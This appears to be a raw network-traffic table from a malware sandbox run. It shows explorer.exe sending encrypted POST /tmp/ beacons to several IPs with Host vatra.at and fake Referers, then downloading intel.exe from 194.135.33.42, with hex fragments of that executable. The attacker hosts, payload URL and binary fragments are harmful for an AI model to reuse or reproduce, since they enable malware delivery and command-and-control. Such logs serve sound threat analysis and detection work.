Jan 8, 2023 16:15:48.999785900 CET	1849	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:48 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49713	200.46.66.71	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:49.227821112 CET	1850	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yokcj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: vatra.at
Jan 8, 2023 16:15:49.227897882 CET	1850	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 62 5e a4 88 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA -[k,vub^ZdnOGsnc0p\g}'a_7@^=O'E
Jan 8, 2023 16:15:50.108191013 CET	1850	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:49 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49714	187.170.238.164	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:50.605318069 CET	1852	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lrmfyx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 333 Host: vatra.at
Jan 8, 2023 16:15:50.605340958 CET	1852	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 63 05 b4 a2 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA -[k,vucE6ELyhBO-93s-GhECP.FIJkQ\|Q`YPTB{ruj3>PVBNCEybU4zF{
Jan 8, 2023 16:15:51.328499079 CET	1853	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:51 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49696	58.235.189.192	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:19.707701921 CET	94	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://utbgbuc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 298 Host: vatra.at
Jan 8, 2023 16:15:19.707772970 CET	94	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 75 46 b9 ea Data Ascii: ;n%i#y{nqc\|s0h\+o'm?$`7C[zqNA -[k,vuuFItwY>fFei];,vDK?0JTd%Qy}I6BA?Jca$6eM"^(yab$7<
Jan 8, 2023 16:15:20.906863928 CET	95	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:20 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49715	58.235.189.192	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:51.668461084 CET	1854	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wemmwd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 331 Host: vatra.at
Jan 8, 2023 16:15:51.668513060 CET	1854	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 46 4a fd 82 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA -[k,vuFJZClzk/;N02oSb^#ZIVQB=!#'<g/_L/kWY#X! :\qcm%2
Jan 8, 2023 16:15:52.865633965 CET	1855	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:52 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49716	200.46.66.71	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:53.161920071 CET	1856	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ursbcr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 355 Host: vatra.at
Jan 8, 2023 16:15:53.161920071 CET	1856	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 47 17 f1 b8 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?$`7C[zqNA -[k,vuG9\}S?mt/~dxLXG"-vPOXka# Qw#}6p]~E&JV?m:hPi+_~s~C6s
Jan 8, 2023 16:15:54.063467026 CET	1857	IN	HTTP/1.1 200 OK Date: Sun, 08 Jan 2023 15:15:53 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49697	211.119.84.112	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:21.659637928 CET	96	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://laatdiy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 235 Host: vatra.at
Jan 8, 2023 16:15:21.659660101 CET	96	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 2e 42 b2 a8 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA -[k,vu.BZ~Ns7RR\%iE<^ED]WL}>p`408[3^S[z?Q/A!nP2>d1N
Jan 8, 2023 16:15:22.608477116 CET	96	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:22 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 42 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 52 3e 08 a5 6b 5f b5 ab 14 bd ca b0 e5 2b 9a 3a d0 f4 6d 5f 0d 89 Data Ascii: #\(R>k_+:m_

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49698	194.135.33.42	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:22.667541027 CET	97	OUT	GET /intel.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 194.135.33.42
Jan 8, 2023 16:15:22.694494963 CET	98	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 08 Jan 2023 15:15:22 GMT Content-Type: application/octet-stream Content-Length: 1073152 Last-Modified: Sun, 08 Jan 2023 15:10:03 GMT Connection: keep-alive ETag: "63badccb-106000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f7 df 75 fd b3 be 1b ae b3 be 1b ae b3 be 1b ae 0e f1 8d ae b2 be 1b ae ad ec 8e ae af be 1b ae ad ec 98 ae cc be 1b ae 94 78 60 ae b4 be 1b ae b3 be 1a ae 31 be 1b ae ad ec 9f ae 90 be 1b ae ad ec 8f ae b2 be 1b ae ad ec 8a ae b2 be 1b ae 52 69 63 68 b3 be 1b ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 65 09 e0 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 7a 01 00 00 b0 85 02 00 00 00 00 bf 5f 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 86 02 00 04 00 00 2f c8 10 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 7d 01 00 50 00 00 00 00 50 85 02 60 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 34 b7 83 02 00 90 01 00 00 5c 0d 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 84 01 00 00 50 85 02 00 86 01 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 83 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ux`1RichPELeaz_@/}PP` C@.textfxz `.data4\~@.rsrc`P@@
Jan 8, 2023 16:15:22.694519997 CET	100	IN	Data Raw: 01 00 00 00 00 00 34 80 01 00 48 80 01 00 5e 80 01 00 72 80 01 00 82 80 01 00 9a 80 01 00 ae 80 01 00 c4 80 01 00 d6 80 01 00 e4 80 01 00 f6 80 01 00 04 81 01 00 1a 81 01 00 34 81 01 00 4a 81 01 00 5a 81 01 00 6e 81 01 00 7a 81 01 00 88 81 01 00 Data Ascii: 4H^r4JZnz "6B\jx&6Fb~(@Rbp
Jan 8, 2023 16:15:22.694546938 CET	101	IN	Data Raw: 69 7a 65 6d 75 79 65 74 20 74 6f 77 75 7a 75 64 00 00 00 00 58 6f 62 75 73 75 68 65 73 20 6a 6f 72 69 64 65 66 69 20 76 69 70 65 70 6f 70 00 00 20 25 73 20 25 64 20 25 66 00 00 00 52 65 68 75 77 69 77 61 72 69 64 6f 20 73 6f 77 65 72 69 7a 61 20 Data Ascii: izemuyet towuzudXobusuhes joridefi vipepop %s %d %fRehuwiwarido soweriza funezevadixokeJug dojixat dasi soseh robuYogogexa bifu wenazopurudan hagedepimecoxV@@@??33
Jan 8, 2023 16:15:22.694570065 CET	102	IN	Data Raw: 65 20 6c 69 62 72 61 72 79 20 69 6e 63 6f 72 72 65 63 74 6c 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 27 73 20 73 75 70 70 6f 72 74 20 74 65 61 6d 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f Data Ascii: e library incorrectly.Please contact the application's support team for more information.R6033- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likel
Jan 8, 2023 16:15:22.694595098 CET	104	IN	Data Raw: 2e 2e 2e 00 3c 70 72 6f 67 72 61 6d 20 6e 61 6d 65 20 75 6e 6b 6e 6f 77 6e 3e 00 00 52 75 6e 74 69 6d 65 20 45 72 72 6f 72 21 0a 0a 50 72 6f 67 72 61 6d 3a 20 00 00 00 00 00 00 00 05 00 00 c0 0b 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 Data Ascii: ...<program name unknown>Runtime Error!Program: EncodePointerKERNEL32.DLLDecodePointer
Jan 8, 2023 16:15:22.694618940 CET	105	IN	Data Raw: 00 b4 91 72 eb 3f f6 8c ed 38 7b 4b 1c 3e 00 00 00 00 00 80 f2 3f 00 00 00 ec 70 de eb 3f 39 95 ba 6c fe 39 24 3e 00 00 00 00 00 00 f3 3f 00 00 00 bc 0a 47 ec 3f dc 61 6a 09 e8 69 39 3e 00 00 00 00 00 80 f3 3f 00 00 00 54 7c ac ec 3f 27 5c 1b f2 Data Ascii: r?8{K>?p?9l9$>?G?aji9>?T\|?'\\|#<>?$?}dj#>?Wn?MVx:>?,?18o,>?D$?c/>?@ \|?x7\|1>?\|?9>?p
Jan 8, 2023 16:15:22.694644928 CET	106	IN	Data Raw: 00 00 00 00 00 80 06 40 00 00 00 30 f3 b8 f3 3f 37 da a8 2e ea 59 18 3e 00 00 00 00 00 c0 06 40 00 00 00 50 e6 c6 f3 3f 9b 1d 5b eb 08 70 26 3e 00 00 00 00 00 00 07 40 00 00 00 d8 94 d4 f3 3f 68 34 8c 4d ee f8 41 3e 00 00 00 00 00 40 07 40 00 00 Data Ascii: @0?7.Y>@P?[p&>@?h4MA>@@?EplE>@+?o$E>@h?\*K>@?-?B>@@P8?(l\|@>@p!?u@J>@@p-?V1>
Jan 8, 2023 16:15:22.694669962 CET	108	IN	Data Raw: f5 3f 86 16 c6 00 73 8a 40 3e 00 00 00 00 00 00 12 40 00 00 00 34 4c a8 f5 3f 50 8f 5f 21 0a be 23 3e 00 00 00 00 00 20 12 40 00 00 00 10 34 ae f5 3f ac e4 83 3a 23 8e 47 3e 00 00 00 00 00 40 12 40 00 00 00 4c 08 b4 f5 3f 71 67 8e 3a 26 08 4a 3e Data Ascii: ?s@>@4L?P_!#> @4?:#G>@@L?qg:&J>`@H?5L$.4>@\w?!1C>@?[<>@D?<=@?~=@y?B> @?
Jan 8, 2023 16:15:22.694709063 CET	109	IN	Data Raw: 00 a0 18 40 00 00 00 44 ad 91 f6 3f 71 8d c8 c2 4a bc 4b 3e 00 00 00 00 00 c0 18 40 00 00 00 4c eb 94 f6 3f c8 18 1d 00 3b 2c 2a 3e 00 00 00 00 00 e0 18 40 00 00 00 38 21 98 f6 3f df f8 8c 94 82 ea 44 3e 00 00 00 00 00 00 19 40 00 00 00 2c 4f 9b Data Ascii: @D?qJK>@L?;,*>@8!?D>@,O? E> @Du?in]D>@@?%3F>`@P?^F"VM>@?}30}->@@?~Fy;>@?lR(>
Jan 8, 2023 16:15:22.694736958 CET	110	IN	Data Raw: 34 a2 4f 0a 3e 3e 00 00 00 00 00 60 1f 40 00 00 00 a8 9f 1c f7 3f 58 45 da 93 a5 20 4a 3e 00 00 00 00 00 80 1f 40 00 00 00 a4 a5 1e f7 3f 28 c7 67 d4 b9 d1 2c 3e 00 00 00 00 00 a0 1f 40 00 00 00 98 a7 20 f7 3f 34 33 2d 73 0f 70 46 3e 00 00 00 00 Data Ascii: 4O>>`@?XE J>@?(g,>@ ?43-spF>@"?P`E5+*>@$?=QQD> @-DT!?\3&<_nextafter_logb_yn_y1_y0frexpfmod_hypot_cabsldexpfabssqrtatan2
